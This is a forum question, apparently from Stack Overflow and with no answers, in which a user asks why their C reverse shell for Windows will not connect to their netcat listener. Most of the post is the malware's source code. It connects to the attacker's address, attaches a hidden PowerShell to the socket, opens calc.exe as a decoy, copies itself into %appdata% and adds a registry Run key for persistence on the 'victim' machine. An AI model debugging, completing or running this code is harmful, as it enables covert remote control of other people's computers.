0

i'm trying to make a simple reverse shell in c, but the issue arrives when i have to connect the victim to my computer. I set up my listener but it never connects, it only open a blank cmd at the victim pc. the code is this



#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdlib.h>

#pragma comment(lib, "Ws2_32.lib")
#define DEF_BUFF 2048

void runShell(char* server, int Port)
{
    while(1)
  {
     
     WSADATA wsaData;
     SOCKET Winsock;
     struct sockaddr_in address;
     char Rec_dat[DEF_BUFF];
     STARTUPINFO process_startup;
     PROCESS_INFORMATION p_info;
 
    WSAStartup(MAKEWORD(2,2), &wsaData);
    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

   
    address.sin_family = AF_INET;
    address.sin_port = htons(Port);
    address.sin_addr.s_addr =inet_addr(server);
   
    WSAConnect(Winsock,(SOCKADDR*)&address, sizeof(address),NULL,NULL,NULL,NULL);
    if (WSAGetLastError() == 0)
        {

        memset(&process_startup, 0, sizeof(process_startup));
                char proc[] = "powershell.exe -WindowStyle Hidden";
        process_startup.cb=sizeof(process_startup);
        process_startup.dwFlags=STARTF_USESTDHANDLES;
        process_startup.hStdInput = process_startup.hStdOutput = process_startup.hStdError = (HANDLE)Winsock;
        CreateProcess(NULL, proc, NULL, NULL, TRUE, 0, NULL, NULL, &process_startup, &p_info);
               WaitForSingleObject(p_info.hProcess, INFINITE);
               CloseHandle(p_info.hProcess);
               CloseHandle(p_info.hThread);
               memset(Rec_dat, 0, sizeof(Rec_dat));
               int Rec_code = recv(Winsock, Rec_dat, DEF_BUFF, 0);
               if (Rec_code <= 0)
               {
                 closesocket(Winsock);
                 WSACleanup();
                 continue;
               } // end if
               if (strcmp(Rec_dat, "exit\n") == 0)
               {
                   exit(0);
                } // end if
      } // end while
   } // end function runShell
}


int main()
 {
        char ip[] = "192.168.61.209";
        int p = 8080;
        system("start C:\\WINDOWS\\System32\\calc.exe"); // fire decoy
        system("cmd /c copy .\\reverse.exe %appdata%");  // copy malware to appdata
        system("cmd /c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"Secure\" /t REG_SZ /F /D \"%appdata%\\reverse.exe")
        runShell(ip, p);   // call the runShell
        return 0;
 } // end main

on my pc, i set up the listener with netcat, but i'm unable to connect the two computers.

ElToreador
  • 1
  • 3

0 Answers0